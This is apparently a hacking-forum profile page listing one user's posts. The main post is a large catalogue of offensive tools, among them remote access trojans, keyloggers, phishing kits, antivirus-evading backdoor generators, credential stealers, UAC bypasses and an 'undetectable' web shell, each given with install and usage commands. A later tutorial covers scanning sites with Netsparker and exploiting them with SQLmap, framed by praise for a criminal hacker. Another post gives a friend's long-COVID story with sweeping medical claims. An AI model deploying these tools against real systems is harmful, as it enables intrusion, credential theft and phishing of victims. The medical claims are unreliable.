Jump to content

ladetaille

VIP
  • Content Count

    37
  • Joined

  • Last visited

Community Reputation

0 Neutral

4 Followers

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. ╦ ╦╔═╗ ╔═╗ ╦╔═╠═╣╠═╣ ║ ╠╩╗╩ ╩╩ ╩ ╚═╝ ╩ ╩'╔╦╗╔═╗╔═╗╦ ╔═╗║ ║ ║║ '║║ ╚═╗╩ ╚═╝╚═╝╩═╝╚═╝Anti Forensics ToolsAudioStego - Audio file steganography. Hides files or text inside audio files and retrieve them automaticallyInstallation :sudo apt-get install libboost-all-devgit clone https://github.com/danielcardeenas/AudioStego.gitcd AudioStegomkdir buildcd buildcmake ..makedban - Hard Drive Eraser & Data Clearing UtilityInstallation : https://sourceforge.net/projects/dban/OpenStego - The free steganography solutionDownload : https://sourceforge.net/projects/openstego/srm - srm (secure rm) is a command-line program to delete files securelyDownload : https://sourceforge.net/projects/srm/Steghide - Steganography program that is able to hide data in various kinds of image- and audio-filesDownload : steghide.sourceforge.netExploitation ToolsAuto-Root-Exploit - Find exploits on Linux KernelInstallation :git clone https://github.com/nilotpalbiswas/Auto-Root-Exploit/cd Auto-Root-ExploitUsage: bash auto-root.shAutoSploit - Automated Mass ExploiterInstallation :git clone https://github.com/NullArray/AutoSploitcd AutoSploitchmod +x install.sh./install.shUsage : python autosploit.pybeef - The Browser Exploitation Framework ProjectWebsite: https://beefproject.com/Installation:sudo apt install beef-xssUsage : beefWeb Panel : 127.0.0.1:3000/ui/panelBeRoot - Find a way to escalate our privilege (linux)Installation:git clone https://github.com/AlessandroZ/BeRoot/cd BeRoot/LinuxUsage : python beroot.pyCrackMapExec - A swiss army knife for pentesting networksInstallation:apt-get install -y libssl-dev libffi-dev python-dev build-essentialgit clone --recursive https://github.com/byt3bl33d3r/CrackMapExeccd CrackMapExecpip3 install -r requirements.txtpython3 setup.py installUsage : crackmapexecDccwBypassUAC - Windows 8.1 and 10 UAC bypass abusing WinSxS in "dccw.exe"Download : https://github.com/L3cr0f/DccwBypassUAC/blob/release/DccwBypassUAC/Release/DccwBypassUAC.exeUsage : C:\Users\L3cr0f> DccwBypassUAC.exeInvoke-PSImage - Embeds a PowerShell script in the pixels of a PNG fileDownload : peewpw/Invoke-PSImage Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute - peewpw/Invoke-PSImage github.com KeeFarce - Extracts passwords from a KeePass 2.x database, directly from memoryInstallation (Windows):C:> curl -LO https://github.com/denandz/KeeFarce/blob/master/prebuilt/x64.zipkoadic - C3 COM Command & ControlInstallation:git clone https://github.com/zerosum0x0/koadic.gitcd koadicpip3 install -r requirements.txt./koadicmeterssh - Inject shellcode into memory and tunnel port over SSH(windows)Installation:git clone https://github.com/trustedsec/metersshcd metersshnano meterssh.pyEdit:user = "sshuser"# password for SSHpassword = "sshpw"# this is where your SSH server is runningrhost = "192.168.1.1"# remote SSH port - this is the attackers SSH serverport = "22"PowerShell-Suite - Collection of PowerShell utilities(windows)Download : https://github.com/FuzzySecurity/PowerShell-SuiteUACME - Defeating Windows User Account Control 60+ Methods(windows)Download: https://github.com/hfiref0x/UACMEUsage:akagi32.exe 1akagi64.exe 3akagi32 1 c:\windows\system32\calc.exeakagi64 3 c:\windows\system32\charmap.exeWinPwnage - Elevate, UAC bypass, privilege escalation, dll hijack techniquesInstallation:git clone https://github.com/rootm0s/WinPwnagecd WinPwnagepip install -r requirements.txtpip install pyinstallerpyinstaller --onefile main.pyUsage: main.py --scan uacForensics ToolsAutopsy - Digital forensics platformInstallation: apt-get install autopsy -ybulk_extractor - Scans a disk image, a file, or a directory of filesInstallation: apt-get install bulk-extractor bulk-extractor-dbgsym -yScalpel - Open source data carving tooInstallation: apt-get install scalpel -yvolatility - Volatile memory extraction utility frameworkInstallation: apt-get install volatility volatility-tools -ybinwalk - A fast, easy to use tool for analyzing, reverse engineering, and extracting firmware imagesInstallation: apt-get install binwalk -yCatfish - Versatile file searching toolInstallation: apt-get install catfish -ydc3dd - A patched version of GNU dd with added features for computer forensicsInstallation: apt-get install dc3dd -yDumpsterDiver - Analyze big volumes of various file types in search of hardcoded secretsInstallation:git clone https://github.com/securing/DumpsterDivercd DumpesterDiverpip install -r requirements.txtUsage: python3 DumpersterDiver.pyfrida-extract - Based RunPE extraction toolInstallation:git clone https://github.com/OALabs/frida-extractcd frida-extractORpip install fridaUsage: python FridaExtract.py bad.exeImage-ExifTool - Read, Write and Edit Exif metadataInstallation: apt-get install libimage-exif-perl libimage-exiftool-perl -ywhatsapp-viewer - Small tool to display chats from the Android msgstore.db database(windows)Installation:C:> curl -LO https://github.com/andreas-mausch/whatsapp-viewer/releases/download/v1.12/WhatsApp.Viewer.zipUnzip and run WhatsAppViewer.exeInformation Gatheringbing-ip2hosts - Enumerate hostnames from BingInstallation:apt-get install bing-ip2hostsGithub: https://github.com/urbanadventurer/bing-ip2hostsUsage : bing-ip2hosts -o results.txt -u github.ioreplace github.io with website.datasploit - OSINT Framework to perform various recon techniquesInstallation:pip install --upgrade --force-reinstall -r requirements.txtgit clone https://github.com/DataSploit/datasploitcd datasploitpip --upgrade -r requirements.txt && while read line; do pip install $line; done < requirements.txtsed -i 's/dep_check.check_dependency()/#/g' datasploit.pysed -i 's/import dep_check/#/g' datasploit.pyUsage: python2 datasploit.py -i target.comdnsenum - Perl script that enumerates DNS informationInstallation : apt-get install dnsenumdnsmap - Subdomain brute-forcingInstallation : apt-get install dnsmapdnsrecon - DNS Enumeration ScriptInstallation : apt-get install dnsrecondork-cli - Command-line Google dork toolInstallation:git clone https://github.com/jgor/dork-clicd dork-clichmod +x dork-cli-pyUsage: ./dork-cli.py inurl:logindorks - Google hack database automation toolInstallation :git clone https://github.com/USSCltd/dorkscd dorksapt-get install phantomjsUsage: phantomjs ghdb -q linux -o linux_dorks.txtUsage: phantomjs google -d inurl:upload.php -t 5 -T 3pagodo - Automate Google Hacking Database scrapingInstallation:git clone https://github.com/opsdisk/pagodo.gitcd pagodopip install -r requirements.txtapt install proxychains4 -yUsage: proxychains4 python3 pagodo.py -g ALL_dorks.txt -s -e 17.0 -l 700 -j 1.1Usage: python3 ghdb_scraper.py -j -sNote: edit proxychains by yourselffaraday - Collaborative Penetration Test and Vulnerability Management PlatformInstallation : apt-get install faraday -yfierce - DNS Analysis perl scriptInstallation : apt-get install fierce -youhping - Network tool able to send custom TCP/IP packetsInstallation : apt-get install hping3knock - Subdomain ScanInstallation :sudo apt-get install python-dnspythongit clone https://github.com/guelfoweb/knock.gitcd knocknano knockpy/config.json (setup here your virustotal.com api key)sudo python setup.py installUsage: knockpy website.commasscan - Fast TCP port scannerInstallation : apt-get install masscanmetagoofil - Document and metadata reconnaissance (updated version)Installation : apt-get install metagoofilonioff - An onion url inspector for inspecting deep web linksInstallation :git clone https://github.com/k4m4/onioff.gitcd onioffpip3 install -r requirements.txtUsage: python3 onioff.py http://xmh57jrzrnw6insl.onion/Usage: python3 onioff.py -f urllist.txt -o report.txtOSINT-SPY - Performs OSINT scan on email/domain/ip_address/organizationInstallation :git clone https://github.com/SharadKumar97/OSINT-SPY.gitcd OSINT-SPYpip install -r requirements.txtSetup:API Websites:https://account.shodan.io/register | config: shodan_api_keyhttps://dashboard.fullcontact.com/register | config: fullcontact_api_keyhttps://www.virustotal.com/gui/join-us | config: virus_total_api_keyhttps://hunter.io/users/sign_up | config: email_hunter_api_keyInfo BTC Owner : python osint-spy.py --btc_address 1DST3gm6JthxhuoNKFqXrdpzPFfz1WgHpW --jsonInfo Website : python osint-spy.py --domain google.com --jsonVuln Webcam : python osint-spy.py --device webcam --jsonEmail Info : python osint-spy.oy --email test@viperzcrew.com --jsonSimplyEmail - Email recon made fast and easyInstallation :git clone --branch dev https://github.com/killswitch-GUI/SimplyEmail.gitcd SimplyEmail./setup/setup.shcd ..cd SimplyEmailUsage:./SimplyEmail.py -all -e viperzcrew.com./SimplyEmail.py -all -v -verify -e viperzcrew.comspiderfoot - OSINT collection and reconnaissance toolInstallation :git clone https://github.com/smicallef/spiderfoot.gitcd spiderfootpip3 install -r requirements.txtUsage: python3 sf.pyWeb: python3 sf.py -l 127.0.0.1:5001surfraw - a fast UNIX command line interface to a variety of popular WWW search enginesInstallation : apt-get install surfraw -yTekDefense-Automater - IP URL and MD5 OSINT AnalysisInstallation :git clone https://github.com/1aN0rmus/TekDefense-Automater.gitcd TekDefense-AutomaterUsage:Auto : python Automater.py <ip address>Normal : python Automater.py -o result.txt -d 5 <ip address>theHarvester - E-mails, subdomains and names Harvester - OSINTInstallation :git clone https://github.com/laramies/theHarvestercd theHarvesterapt-get install python3-dev python3-pip -ypip3 install -r requirements/base.txtpip3 install -r requirements/dev.txtpython3 setup.py || python3 setup.py installIf the above pip3 commands not working try this:while read line; do pip3 install $line; done < requirements/base.txtwhile read line; do pip3 install $line; done < requirements/dev.txtUsage: python3 theHarvester.py -d viperzcrew.com -l 500 -S 0 -g --dns-server -n -c -f result.txt -b alltrape - People tracker on the Internet: OSINT analysis and research tool by Jose PinoInstallation :git clone https://github.com/jofpin/trape.gitcd trapepip2 install -r requirements.txtIf you have ngrok token:python2 trape.py --ngrok <token>python2 --port 6666 --url viperzcrew.comWhatWeb - Web scannerInstallation : apt-get install whatweb -yxray - A tool for recon, mapping and OSINT gathering from public networksInstallation:git clone https://github.com/evilsocket/xray.gitcd xraymakeUsage: xray -shodan-key yourshodaniapi -domain domainzmap - Fast single packet network scannerInstallation : apt-get install zmap -yUsage: zmap -p 21 -o result.txt -i <interface> --vpn --ignore-invalid-hosts--vpn if you are using vpn!KeyloggersBeeLogger - Generate Gmail Emailing Keyloggers to WindowsInstallation :git clone https://github.com/4w4k3/BeeLogger.gitcd BeeLoggersudo chmod +x install.sh./install.shpython2 bee.pyKeylogger - A simple keylogger for Windows, Linux and MacInstallation : pip install keyloggerUsage: keyloggerRadium-Keylogger - Python keylogger with multiple featuresInstallation :git clone https://github.com/mehulj94/Radiumcd Radiumpip2 install -r requirements.txtpython2 Radiumkeylogger.Maintaining AccessEggShell - iOS/macOS/Linux Remote Administration ToolInstallation :git clone https://github.com/neoneggplant/eggshellcd eggshellUsage: python eggshell.pyEvilOSX - An evil RAT (Remote Administration Tool) for macOS / OS XInstallation :git clone https://github.com/Marten4n6/EvilOSXcd EvilOSXsudo pip install -r requirements.txtUsage: python start.pyMetasploit - The world’s most used penetration testing frameworkInstallation : sudo apt-get install metasploit -yParat - Python based Remote Administration Tool(RAT)Installation :git clone https://github.com/micle-fm/Parat && cd ParatUsage: python main.pypupy - An opensource, cross-platform, multi function RATInstallation :git clone --recursive https://github.com/n1nj4sec/pupycd pupysudo chmod +x *./create-workspace.py pupywsQuasarRAT - Remote Administration Tool for WindowsDownload : https://github.com/quasar/Quasar/releases/download/v1.4.0/Quasar.v1.4.0.zipSetup : https://github.com/quasar/Quasar/wikitgcd - TCP/IP Gender Changer DaemonDownload : https://sourceforge.net/projects/tgcd/TheFatRat - An Easy tool to Generate Backdoor for bypass AVInstallation :git clone https://github.com/Screetsec/TheFatRat.gitcd TheFatRatchmod +x setup.sh && ./setup.shVeil - Tool designed to generate metasploit payloads that bypass common anti-virus solutionsInstallation :sudo apt-get -y install gitgit clone https://github.com/Veil-Framework/Veil.gitcd Veil/./config/setup.sh --force --silentWMImplant - PowerShell based tool that is designed to act like a RATDownload : https://github.com/FortyNorthSecurity/WMImplantAhMyth - Android RATDownload : https://github.com/AhMyth/AhMyth-Android-RAT/releasesPassword AttacksBEWGor - Bull's Eye Wordlist GeneratorInstallation :git clone https://github.com/berzerk0/BEWGorcd BEWGorUsage : python BEWGor.py -inputbruteforce-wallet - Try to find the password of an encrypted Peercoin (or Bitcoin, Litecoin, etc...) wallet fileInstallation :git clone https://github.com/glv2/bruteforce-walletcd bruteforce-walletapt install libdb-dev libssl-dev -y./autogen.sh.configure && make; make installUsage : bruteforce-wallet -t 6 -f dictionary.txt wallet.datchntpw - Utility to reset the password on WindowsInstallation : apt-get install chntpwchromepass - View passwords stored by Google Chrome Web browserDownload : https://www.nirsoft.net/utils/chromepass.htmlcrowbar - Brute forcing toolInstallation : sudo apt install -y crowbarnmap openvpn freerdp2-x11 tigervnc-viewer python3 python3-pip -ycupp - Common User Passwords ProfilerInstallation :git clone https://github.com/Mebus/cuppcd cupppython3 setup.py || python3 setup.py installUsage: python3 cupp.py -ihashcat - Advanced Password RecoveryInstallation : apt-get install hashcat -yJohn the Ripper - A fast password crackerInstallation : sudo apt-get install john -yLaZagne - Credentials recovery projectInstallation :git clone https://github.com/AlessandroZ/LaZagnecd LaZagnepip install -r requirements.txtcd LinuxUsage: python laZagne.py allmimikatz - A little tool to play with Windows securityDownload : https://github.com/gentilkiwi/mimikatz/releasespasswordfox - Extract the user names/passwords stored in FirefoxDownload : https://www.nirsoft.net/utils/passwordfox.htmlfcrackzip - A braindead program for cracking encrypted ZIP archivesInstallation :git clone https://github.com/hyc/fcrackzipcd fcrackzip./configure || configuremake; make installUsage: fcrackzip -b -c a -p aaaaaa ./noradi.zipSSH-Brute-Forcer - A Simple Multi-Threaded SSH Brute Forcergit clone https://github.com/R4stl1n/SSH-Brute-Forcercd SSH-Brute-Forcerpip install -r requirements.txtcd srcUsage: python SSHBruteForce.py -i 127.0.0.1 -d True -p 2222 -U ./usernames.txt -P ./passwords.txtWCE - Windows Credentials EditorDownload : https://github.com/returnvar/wce/releasesReverse EngineeringIDA - Windows, Linux or Mac OS X hosted multi-processor disassembler and debuggerDownload : https://ida.winsite.com/OllyDBG - A 32-bit assembler level analysing debugger for Microsoft WindowsDownload : https://sourceforge.net/projects/x64dbg/Resource Hacker - A freeware resource compiler & decompiler for Windows applicationsDownload : http://angusj.com/resourcehacker/apktool - A tool for reverse engineering Android apk filesInstallation : apt-get install apktool -ysmali - smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementationDownload : https://bitbucket.org/JesusFreke/smali/downloads/Sniffing SpoofingEttercap - A comprehensive suite for man in the middle attacksInstallation : apt-get install ettercapbettercap - The Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and MITM attacksInstallation : apt-get install bettercap -ymacchanger - Utility that makes the manipulation of MAC addresses of network interfaces easierInstallation : apt-get install macchanger -ymitmproxy - Free and open source interactive HTTPS proxyInstallation : apt-get install mimtproxy -ymkcert - Make locally trusted development certificates with any names you'd likeInstallation :git clone https://github.com/FiloSottile/mkcertcd mkcertapt install libnss3-toolsgo build -ldflags "-X main.Version=$(git describe --tags)"Usage: mkcert -key-file key.pem -cert-file cert.pem example.com *.example.comsslstrip - SSL/TLS man-in-the-middle attack toolInstallation : apt-get install sslstrip -yWireshark - The world’s foremost and widely-used network protocol analyzerInstallation : apt-get install wireshark -ymoloch - An open source, large scale, full packet capturing, indexing, and database system.Installation:git clone https://github.com/aol/moloch./easybutton-build.sh --installmake configSocial Engineeringevilginx2 - Standalone man-in-the-middle attack frameworkInstallation :sudo apt-get install git makego get -u github.com/kgretzky/evilginx2cd $GOPATH/src/github.com/kgretzky/evilginx2makeUsage: sudo ./evilginx -dGophish - Open-Source Phishing FrameworkDownload : https://github.com/gophish/gophish/releases/HiddenEye - Modern phishing tool with advanced functionalityInstallation :git clone https://github.com/DarkSecDevelopers/HiddenEye.gitchmod +x cd HiddenEyesudo apt install python3-pipsudo pip3 install -r requirements.txtsudo pip3 install requestssudo pip3 install pyngrokUsage: python3 HiddenEye.pyking-phisher - Phishing Campaign ToolkitInstallation : apt-get install king-phisher -yReelPhish - A Real-Time Two-Factor Phishing ToolInstallation :git clone https://github.com/fireeye/ReelPhishcd ReelPhishpip install -r requirements.txtUsage: python2 ReelPhish.py --browser FF --logging debug --submitBrowser: 127.0.0.1:2135social-engineer-toolkit - Open-source penetration testing framework designed for social engineeringInstallation :git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/cd setoolkitpip3 install -r requirements.txtpython setup.pyUsage: setoolkitVulnerability AnalysisAm-I-affected-by-Meltdown - Meltdown Exploit - Proof-of-conceptInstallation :git clone https://github.com/raphaelsc/Am-I-affected-by-Meltdown.gitcd ./Am-I-affected-by-Meltdownmaketaskset 0x1 ./meltdown-checkerCMSmap - python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSsInstallation :git clone https://github.com/Dionach/CMSmapcd CMSmappip3 install .Usage: cmsmaplinux-exploit-suggester - Linux privilege escalation auditing toolInstallation :wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.shUsage: ./linux-exploit-suggester.shLynis - Auditing tool for Unix-based systemsInstallation :git clone https://github.com/CISOfy/lyniscd lynis; ./lynis audit systemNmap - The Network MapperInstallation : apt-get install nmap -ysqlmap - Automatic SQL injection and database takeover toolInstallation : apt-get install sqlmap -yunix-privesc-check - Shell script to check for simple privilege escalation vectors on Unix systemsInstallation : apt-get install unix-privesc-check -yWapiti - The web-application vulnerability scannerInstallation : apt-get install wapiti -ywesng - Windows Exploit Suggester - Next GenerationInstallation :git clone https://github.com/bitsadmin/wesngcd wesngpython setup.py || python setup.py installUsage: python wes.py --updateMobile Security Framework (MobSF) - Mobile Security Framework is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing frameworkInstallation :sudo apt-get install python3.7 openjdk-8-jdksudo apt install python3-dev python3-venv python3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev wkhtmltopdfgit clone https://github.com/MobSF/Mobile-Security-Framework-MobSFcd Mobile-Security-Framework-MobSF./setup.shWeb ApplicationsBurp Suite - Web vulnerability scannerInstallation : apt-get install burpsuite -yCLOUDKiLL3R - Bypasses Cloudflare protection service via TOR Browser using crimeflare !Installation :git clone https://github.com/inurlx/CLOUDKiLL3Rcd CLOUDKiLL3Rpip install argparsepip install sockspip install socketpip install requestspip install sysUsage: python CK.pyNikto - Web server scannerInstallation : apt-get install nikto -yowtf - Offensive Web Testing Framework (OWTF)Installation :git clone https://github.com/owtf/owtfcd owtfpython setup.py developUsage: otfBrwoser: localhost:8080wafw00f - Fingerprint Web Application Firewall (WAF)Installation : apt-get install wafw00fw3af - Web Application Attack and Audit FrameworkInstallation : apt-get install w3af -yWfuzz - Web application fuzzerInstallation : apt-get install wfuzzWhatWaf - Detect and bypass web application firewalls and protection systemsWPscan - WordPress vulnerability scannerInstallation : apt-get install wpscan -yWeb Shellsweevely3 - Weaponized web shellInstallation :git clone https://github.com/epinna/weevely3cd weevely3pip3 install -r requirements.txtUsage: python3 weevely3b374k - PHP Webshell with handy featuresInstallation :git clone https://github.com/b374k/b374kcd b374kUsage: php -f index.phpEx: php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9Miyachung - PHP BackConnect ShellDownload : https://packetstormsecurity.com/files/download/122612/miyabc.php.txt(rename from php.txt to php)wso-2.8-web-shell - Automatically exported from code.google.com/p/wso-web-shell-2-8Download : https://github.com/rzkyh007/wso-web-shell-2-8/blob/master/WSO2.8_undetectable.phpWireless AttacksAircrack-ng - A complete suite of tools to assess WiFi network securityInstallation : apt-get install aircrack-ngairgeddon - Multi-use bash script for Linux systems to audit wireless networksInstallation :git clone --depth 1 https://github.com/v1s1t0r1sh3r3/airgeddon.gitcd airgeddonsudo bash airgeddon.shBluelog - A highly configurable Linux Bluetooth scannerInstallation : apt-get install bluelog -yfluxion - Fluxion is a remake of linset by vk496 with less bugs and enhanced functionalityInstallation :wget https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/install/install.sh && bash install.shinfernal-twin - This is automated wireless hacking toolInstallation :git clone https://github.com/entropy1337/infernal-twincd infernal-twinchmod +x *./InfernalWireless.pykismet - An 802.11 layer2 wireless network detector, sniffer, and intrusion detection systemInstallation : apt-get install kismet -ykrackattacks-scripts - WPA2 Krack Attack ScriptsInstallation :apt-get updateapt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome virtualenvgit clone https://github.com/vanhoefm/krackattacks-scriptscd krackattacks-script/hostapdcp defconfig .configmake -j 2cd ..; cd krackattackpip install -r requirements.txtUsage: ./krack-test-client.py --replay-broadcastKRACK Detector - Detect and prevent KRACK attacks in your networkInstallation :git clone https://github.com/securingsam/krackdetectorcd krackdetectorUsage: python krack_detect.py <interface>Usage: python krack_detect.py wlan0Pixiewps - An offline Wi-Fi Protected Setup brute-force utilityInstallation : apt-get install pixieswps -yRouterSploit - Exploitation Framework for Embedded DevicesInstallation : apt-get install routersploit -ywifi-arsenal - Resources for WiFi PentestingLink : https://github.com/0x90/wifi-arsenalDo not clone it will overfill your space xDWifiphisher - The Rogue Access Point FrameworkInstallation : apt-get install wifiphisher -yWiFi-Pumpkin - Framework for Rogue Wi-Fi Access Point AttackInstallation :sudo apt install libssl-dev libffi-dev build-essentialgit clone https://github.com/P0cL4bs/wifipumpkin3.gitcd wifipumpkin3sudo apt install python3-pyqt5sudo python3 setup.py installUsage: wifipumpkin3𝗧𝗛𝗜𝗦 𝗪𝗔𝗦 𝗖𝗢𝗟𝗟𝗘𝗖𝗧𝗘𝗗 𝗕𝗬 𝗟𝗜𝗡𝗞𝗦, 𝗜𝗡𝗦𝗧𝗔𝗟𝗟𝗔𝗧𝗜𝗢𝗡 𝗣𝗥𝗢𝗚𝗥𝗘𝗦𝗦 𝗘𝗧𝗖... !
  2. The story of one patient About a year ago, one of my acquaintances did not mind getting sick with coronavirus. His naive delusions in the absence of dangers for the lives of young people were pretty much seasoned with the cheerful stories of friends who had recovered from illness, who got off with a slight cold. How wrong he was. Most likely, it was just frivolity and not enough frequent hand washing that ultimately led to his natural infection. So, a couple of months ago, a friend was diagnosed with a coronavirus. I do not know what this is connected with, the specifics of the organism, or a mutated strain of the virus itself, but his experience of the disease was very painful and no less prolonged. It all started in the classics. Mild fever, sore throat. At first glance - an easy form, and he felt great. But on the 3rd day of illness, terrible things began to happen to him. Trying to sleep at night, the comrade noticed that something was wrong with him. He got out of bed and realized that he was losing consciousness. Buzz in the ears, darkening in the eyes, legs do not hold. Of course, he immediately thought he was going to die. But still he stayed on his feet. Raised low blood pressure with sugar tea and somehow managed to fall asleep. In the morning, an acquaintance was literally smeared - the most severe phase of the disease began. In a nutshell - you cannot do anything and lie dumbly. I don't even want to look at the smartphone screen, and the temperature goes off scale. Feels like your brain is melting. Thoughts are intertwined and you cannot formulate anything, delusional, unrelated ideas appear. Then everything calmed down and real mind games began. His health became much better, but an incomprehensible chest discomfort appeared. The obvious onset of pneumonia, which is probably the most unpleasant sensation from covid. You seem to be breathing, but at the same time you understand that you are half full of strength. This is aggravated by anxiety and panic measurements of blood oxygen levels every 15 minutes. The most unpleasant thing is that from all this discomfort you fall into a state of permanent anxiety, an obsessive fear of death appears and you cannot sleep normally. Pneumonia has passed - we meet a new misfortune! Sharp chest pains. After such a call on another sleepless night, he rushed into the cardiologist's office with his feet. Total - a heart like a bull, no violations were found. As it turned out, the friend started intercostal neuralgia. It hurts clearly in the same place where the heart should be and terribly interferes with sleep. The worst thing is that she accompanies him to this day. Postcovid Syndrome My acquaintance once again pulled out a "lucky" ticket and was among those 20% of people to whom the disease became attached an order of magnitude longer than the promised two weeks. So, what exactly is this postcovid syndrome? Roughly speaking, this is when the symptoms of the disease last more than 12 weeks. At the same time, the disease in you, as it were, is no longer there, and antibodies have long been developed. These are muscle spasms, and that very heavy breathing, and digestive problems and a bunch of other things, you can read the full list yourself on the Internet, and I will tell you which of these symptoms have remained with him to this day. First of all, the coronavirus hit his psyche in the most serious way. He seems to be breathing normally, but psychosomatics does not leave. Comrade still, every night, looks at his breathing and is paranoid about the fact that he is breathing badly. Let's go further. As for neuralgia, everything seems to be clear, she is not going to disappear. On the assurance of a friend, chest pains are still weakened, but very successfully manifested before bedtime. As for the taste and smell, they disappeared, but after a week they returned successfully. But literally this month, his perception of smells flew to hell. Now he constantly tastes strange after eating. The comrade perfectly feels the tastes - salty, sweet, but the strange smell is annoying. It does not work on all food, but for example on meat, coffee and a whole bunch of other things. It looks like a rotten chicken roll and freezes terribly. Something I can't quite imagine such a smell, but it feels disgusting. He is not sure if the covid is related to this, but for six months, he did not have any other health problems. What is all this shit about? Basically, all the consequences of postcovid are due to a violation of the nervous system. The virus is so powerful that it disrupted the functioning of the olfactory nerve, which is responsible for smell, and a bunch of other nerves. There is an imbalance of the two nerve systems - the parasympathetic and the sympathetic, which is why sleep problems, anxiety, tachycardia, and fear of death arise. The worst thing is that there is no way to cure postcovid syndrome. It can only be endured, and it is not clear how long it will take to suffer. Outcome I am very afraid of this disease and do not want to go through what my good friend recently suffered. I will not urge you to wear masks and wash your hands, decide for yourself. I just wanted to share an interesting and alternative experience. Although the crown does not kill young people, it leaves a huge imprint on the nervous system. His case is to prove to you. Now I am trying to heal my comrade with meditation. Let me know if it works. That's all for me, write about your experience of fighting the crown, and especially those who have become victims of the post-coccygeal symptom. Reactions:CreedX
  3. I sell it no longer message on the @krrrbaw telegram to have it
  4. In previous articles, we have already talked about how to test a site for vulnerabilities using the simplest tools.Today we will work with professional software. Namely with Netsprker and SQLmap. It's time to get rid of the pacifier, which is played by programs such as Webcruiser and Albaloo. To begin with, I suggest downloading everything that we will use throughout the article.It is impossible not to mention that this particular "bundle" was used in 2016 by the American hacker Ray Buttler right from prison and achieved impressive results by opening several clandestine "shops" and bitcoin exchanges. Gone are the days, but do not forget that 19% of web applications have vulnerabilities that allow them to gain control over both the application itself and the server OS. Netsparker will find them.We will consider working with the software under Windows, since NetSparker works only on this platform. However, the author recommends using Kali Linux and NetSparker on a virtual machine.Netsparker 5.0.0.19747 - The version I'm using.Netsparker 5.3.0.24388 - Newer than mine, but generally no different except for possible additional functionality), so this article should be relevant for this version ofSQLmap git or Sqlmap Git rarPython 2.7 (for working with SQLmap)Burp SuiteWhy exactly Netsprker and SQLmap?NetSparker is a powerful scanner, SqlMap is a console tool for exploiting found vulnerabilities.Netsparker is a powerful scanner of online resources, sites and web applications for errors, vulnerabilities and minor bugs. In the course of work, he generates a report, describing in as much detail as possible each part of the scanned resource, drawing up its “map”. Flexible settings, an intuitive interface, prompts and a huge base of vulnerabilities, plus a unique tool for detecting false positives, make this tool the de facto leader in the industry. It also has disadvantages: NetSparker is a heavyweight, scanning a resource can take hours, but at the same time the “sparker” will run the site and all its applications for all possible and impossible variants of vulnerabilities.NetSparker is far from the only tool of this kind, there are other good scanners like ZAP, which I will talk about next time.Since, before proceeding directly to exploitation, vulnerabilities must be discovered, therefore, first we will talk about Netsparker. Next, we will look at the basic principles of attacking these vulnerabilities using SQLmap.In order to open the program, you need to double-click on the Netsparker.exe file. After starting the program, we see the following: The start window of the program has six sections, which we should consider: 1 - Field for entering the crawled site. The button built into the input field (the rightmost one, with a green arrow) opens the site that we introduced earlier. Also netsparker remembers the sites that we have already scanned and by clicking on the down arrow, which is located slightly to the left of the button, we can see them. It is very convenient if you suddenly need to go back to rescanning previous sites. 2 - For each crawled site, the program remembers the settings (which we will consider below), and this item allows you to save and select the crawl settings for the selected site. As follows: Save Profile - Save settings Save As New Profile - Save settings for this scan separately Default - Standard scan Previous Settings - Previous scan settings 3 - Site scan settings 4 - Authentication settings on the crawled site. An optional menu, but very useful if you need to scan a resource through your personal account 5 - Field of settings for each item of the third and fourth menus 6 - Start button and cancel button. It is worth mentioning that this item also has its own “settings” window: Start Scan - Getting started. No problems.Crawl and Wait - Crawl without attacks.Manual Crawl (Proxy Mode) - The same quiet mode, but through a proxy. I must warn you that you will need to install the certificate: Scan Imported Links Only - Scans only specific links.Schedule Scan - scheduled scanning.After we have disassembled the interface, it's time to start a detailed study of the menu items. First, let's look at the third section - Scan Settings. We see five items in total. Let's consider them in orderGeneralBasic settings. Let's start by looking at Scan Policy. These are the rules by which the resource will be scanned. Using this item, you can optimize our scan if we already have any information about the target. To do this, you need to click on the button that resembles a magic wand: The following menu opens: This is the welcome window. You can skip it. We look further. Here we select the operating system installed on the scanned server. In this window, we have to select the server installed on the scanned machine. The fourth window is the choice of the language in which the applications of the scanned resource are written. You can select several at once if you are not sure. In this window, select the database that the scanned resource uses. You can choose several if you are not sure. At this stage, we indicate the amount of dynamic content on the site:Little or no dynamic content - there is little dynamic content, or it is decorative, that is, it does not interact in any way with the back-end of theModerately sized dynamic web site - there is a lot of dynamic content and pages with it. Most sites fall into this category.Complex Single-Page-Application - Complex applications that update the content of one page. The seventh window is the search for hidden content. Netsparker enumerates the possible names and names of the contents of the remote server. Here it is possible to set a search limit. The latter is a report of the parameters we selected earlier.Scan Policy Name - the name of the created / optimized policy by us.Click Finish, and in the main menu of the scan settings, we can select our policy. It usually becomes active by default. The next thing we will look at in the main menu is the Report Policy. These are the items on which the program will report. If it is important for you to know only one detail, for example, whether the target has a vulnerability to the same SQL injection, click on three dots and from the entire list, leave only the SQL injection checked: Conveniently, the list is sorted from minimum to maximum.It is better not to disable anything here - let the report be as complete as possible.Custom Cookies is a menu item where you can insert your own cookies, for example, intercepted ones: The last point - setting up the Crawling AKA making a sitemap Find & Follow New Links - Follow the found links.Enable Crawl & Attack at Same Time - Attack simultaneously with scanningPause Scan After Crawling - Stop the software after drawing up a complete sitemap.Incremental Scan - Augmented scan based on the previous scan. Cannot be used without a finished resource card or on a new scanScopeScan area settings Includes only three fields:ScopeSelect the scan scale: Entered Path and Below - Scanning a page and deeperOnly Entered URL - Scanning only an entered pageWhole Domain - Scanning an entire domainNext - Exlude URLs with RegEx Exceptions. Regular expressions, pages with which the program will skipTo invert this function, just mark Include instead of Exclude in the lower right corner of this item: Inlude URLs with RegEx - Regular expressions, pages with which the program will crawl first Disallowed HTTP methods - Disallowed request types In total, the program supports 13 types of requests: We select the methods of requests to the server, turn on everything and we will not change anything here.I will not describe each of them in detail, since this information is not 